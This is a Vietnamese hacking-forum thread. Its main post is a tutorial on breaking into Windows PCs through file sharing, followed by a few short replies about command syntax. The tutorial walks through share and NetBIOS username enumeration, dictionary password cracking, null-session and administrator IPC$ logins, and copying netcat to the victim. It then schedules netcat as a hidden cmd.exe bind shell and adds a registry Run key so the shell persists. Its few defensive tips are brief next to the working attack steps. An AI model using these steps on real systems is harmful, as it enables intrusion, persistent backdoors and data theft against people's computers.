<![CDATA[Latest posts for the topic "Hacking PC resource share - Hướng đi và giải pháp"]]> /hvaonline/posts/list/12.html JForum - http://www.jforum.net Hacking PC resource share - Hướng đi và giải pháp Tác giả: ZENO-HVAOnline Bài viết này với mục đích chia sẻ,học hỏi,trao đổi kiến thức! Nội dung của bài viết là hack vào PC sử dụng HĐH windows và các phương pháp phòng chống (trong phạm vi kiến thức của tui thôi nha). Bây giờ chúng ta cùng bắt đầu suy nghĩ những hướng phải đi. Khi bạn Online ( tức kết nối vào Internet) bạn sẽ được ISP gán cho một IP nào đó. Vậy Hacker có biết được IP của bạn không? Câu trả lời là có ( nếu Hacker giao tiếp với bạn,có nghĩa là máy của bạn và máy của hacker có sự kết nối, đồng nghĩa với việc trao đổi các packet,từ các packet có thể biết được địa chi IP nguồn) Khi biết IP của bạn liệu hacker có thể hack vào máy tính của bạn không? Câu trả lời là hoàn toàn có thể. Vậy hacker làm như thế nào để Hack? Hacking thông qua resource share: Hacker có thể dùng các tool hack tự động ví dụ như : ent3,legion… ( nhưng bản chất của các công cụ này là thưc hiện các bước mà tôi sẽ nói dưới đây 1 cách tự động,chính vì vậy việc dùng các tool này là một cách khá củ chuối …) Trước tiên Hacker sẽ kiểm tra nhưng tài nguyên được chia sẻ trên máy tính của bạn. Chỉ bằng vài dòng lệnh đơn giản trên comand line:
CODE [C:\>Net view \\x.x.x.x ( với x.x.x.x là địa chỉ IP của bạn mà hacker đã biết ) Shared resources at \\x.x.x.x Share name Type Used as Comment ------------------------------------------------------------------------------- C Disk PRJA3 Disk The command completed successfully. C:\> 
Với Windows 95 & 98 thì khả năng bị hack Cao hơn nhiều so với Windows NT,2000,XP ( vì win 95,98 dùng định dạng FAT&FAT32 có độ bảo mật thấp hơn nhiều so với NTFS) Đối với hai loại Windows này (95,98) Hacker thậm chí không cần lấy Administrator cũng có thể làm được tất cả ( bạn có tin không ?). Khuyến cáo : không nên dùng 2 loại win này vì quá lỗi thời và có thể bị hack bất cứ lúc nào. Sau khi liệt kê các Ổ đĩa,folder share bước tiếp theo của hacker là phải truy cập vào các ổ đĩa,folder đó để lấy dữ liệu (đây cũng là mục đích của hacker).Hacker sẽ ánh sạ ổ đĩa ,thư mục share để truy cập vào. Cũng bằng command line: CODE
C:\> net use z: \\x.x.x.x \share The command completed successfully 
. Chẳng lẽ hack đơn gian vậy sao ? Không , không hề đơn giản như thế bởi vì máy của victim có đặt password ( viêc ánh sạ cần phải biết username & password ).Thế là Hacker pó tay ? không hacker không bao giờ chịu pó tay,hacker sẽ cố gắng lấy username & password Lấy Username : CODE C
:\> Nbtstat –A x.x.x.x NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------- ADMIN <00> UNIQUE Registered BODY <00> GROUP Registered ADMIN f <20> UNIQUE Registered BODY <1E> GROUP Registered BODY <1D> UNIQUE Registered ..__MSBROWSE__.<01> GROUP Registered MAC Address = 00-08-A1-5B-E3-8C 
Vậy máy x.x.x.x sẽ có 2 username là : ADMIN va BODY Khi đã có username hacker sẽ tiến hành Crack password ( dựa vào các tool như : pqwak,xIntruder) Hoặc Hacker sẽ tiến hành tạo ra một từ điển ( dựa vào khả năng phán đoán của hacker ) tên là : pass.txt CODE
“” ADMIN 123456 ADMIN 123456 BODY “” BODY … 
Sau đó hacker crack bang lệnh : [/CODE] Cũng có thể tạo Userlist.txt và passlist.txt rồi dùng lệnh: CODE
C:\> FOR /F %i IN (1,1,254) DO nat –u userlist.txt –p passlist.txt x.x.x.x.%I>>output.txt  
Đối với Win 2000,XP hacker sẽ không là gì nếu không phải administrator chính vì vậy hacker bằng mọi giá sẽ lấy cho được administrator. nếu lấy được admin thì việc còn lại thì chờ hacker định đoạt. Khuyến cáo : không nên share gì hết ( trong trường hợp buộc phải share thì nên đặt password phức tạp 1 chút ) Giả sử rằng máy của Victim không share. Vậy hacker làm sao ? Trong trường hợp này hacker sẽ đoán user & pass (có thể dùng cách ở trên hoặc dung các tool như: user2sid/sid2user,dumpACL,SMBGrind……) sau đó kết nối tới IPC$ ( mặc định share của windows) CODE
C:\> net use \\x.x.x.x\IPC$ “password” /user:”administrator” The command completed successfully. 
Trong trường hợp không thê đoán Đươc user & pass hacker có thể thiết lập một Null session tới máy victim: CODE
C:\> net use \\x.x.x.x\IPC$ “” /user:”” The command completed successfully  
Và rồi nếu victim permission không đúng sẽ có nhưng hậu quả khôn lường. khuyến cáo : Vô hiệu hoá NetBios ( Bấm vào My Network Places chọn Local Area Connetion, chọn TCP/ IP sau đó bấm vào propperties chọn Advandce, chọn WINS và bấm vào Disable NetBIOS over TCP / IP), Dùng firewall chặn 1 số port không cần thiết , khoá tài khoản sau 1 số lần đăng nhập thất bại . Tiện đây cũng nói thêm về điều khiển từ xa ( vì có nhiều bạn đột nhập được vào rùi mà không biết phải làm sao ) Giả sử rằng bạn đã có username,password của admin của máy victim rồi: giờ thiết lập 1 phiên làm viêc: CODE
C:\> net use \\x.x.x.x\IPC$ “password” /user:”administrator” The command completed successfully. 
Sau đó ta cần copy backdoor để điều khiển máy victim có rất nhiều loại backdoor nhưng tôi thấy hơn cả vẫn là : netcat ( nc) chép nc vào máy victim CODE C
:\>copy nc.exe \\x.x.x.x\ADMIN$\nc.exe The command completed successfully. 1 file copies 
Chạy service Schedule trên máy victim ( có service này mới thực thi đ ươc các file trên máy victim, mặc đinh khi cài win sẽ chạy service này)
CODE C:\> sc \\x.x.x.x start schedule service_name : schedule 
Bây giờ kiểm tra giờ trên máy victim CODE
C:\> net time \\x.x.x.x Current time at \\10.0.0.31 is 6/29/2005 4:50 AM The command completed successfully. 
Bây giờ chạy netcat ở chế độ ẩn lắng nghe cổng 111: CODE
C:\>AT \\x.x.x.x 4:55 /interactive “c:\windows\nc.exe” –L –d –p111 –e cmd.exe Added a new job with job ID = 1 
đợi đến 4:55 rồi chạy thử nc.exe CODE
C:\>nc –nvv x.x.x.x 111 (UNKNOWN) [x.x.x.x] 111 (?) open Microsoft Windows XP [Version 5.1.2600] © Copyright 1985-2001 Microsoft Corp. C:\windows> 
Bây giờ làm gì thì tuỳ nha ( nhưng đừng có phá hoại người ta nhe’) Vấn đề là làm sao cho những lần sau victim bật máy tính lên netcat tự động chạy và lắng nghe mệnh lệnh của ta? Bạn có thể cho netcat khởi động cùng windows. "moi" file netcat.reg (dùng notepad và save lại thành .reg) có nội dung như sau: CODE
Windows Registry Editor Version 5.00 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] "netcat"="\"C:\\nc\\nc.exe\" -L -d -p111 -e cmd.exe" 
Sau đó copy sang máy victim và chạy nha! Hy vọng mọi người đừng phá hoại nha ! Thân Tác giả: ZENO-HVAOnline ]]>
/hvaonline/posts/list/1106.html#4650 /hvaonline/posts/list/1106.html#4650 GMT
Hacking PC resource share - Hướng đi và giải pháp /hvaonline/posts/list/1106.html#265285 /hvaonline/posts/list/1106.html#265285 GMT Hacking PC resource share - Hướng đi và giải pháp

boyvjp_hacker wrote:
sao tôi dùng lệnh c:\net view x.x.x.x nhưng địa chỉ IP nao cũng không được vậy 
Bạn đọc kĩ lại đi. Code:
net view \\x.x.x.x
chứ không phải
net view x.x.x.x 
]]>
/hvaonline/posts/list/1106.html#265287 /hvaonline/posts/list/1106.html#265287 GMT
Hacking PC resource share - Hướng đi và giải pháp

boyvjp_hacker wrote:
sao tôi dùng lệnh c:\net view x.x.x.x nhưng địa chỉ IP nao cũng không được vậy 
mệt mấy chú này thật chứ mấy cái lệnh cơ bản nhất củng không song mà tối ngày "hac hit", đặt cái nick thấy mất cảm tình rồi.]]>
/hvaonline/posts/list/1106.html#265347 /hvaonline/posts/list/1106.html#265347 GMT
Hacking PC resource share - Hướng đi và giải pháp /hvaonline/posts/list/1106.html#274162 /hvaonline/posts/list/1106.html#274162 GMT Hacking PC resource share - Hướng đi và giải pháp /hvaonline/posts/list/1106.html#275357 /hvaonline/posts/list/1106.html#275357 GMT Hacking PC resource share - Hướng đi và giải pháp

cuongps wrote:
.trên mạng Internet thì nếu giao tiếp với nhau chỉ thấy được Wan IP của Victim thôi chứ?-Tức là cái IP mà ISP cấp cho con modem nhà bạn thôi... 
Có chỗ em không hiểu. Theo như anh cuongps nói thì một nhà có 3 mấy tính sử dụng chung một modem thì có chũng một Wan IP sao? hì hì.]]>
/hvaonline/posts/list/1106.html#275515 /hvaonline/posts/list/1106.html#275515 GMT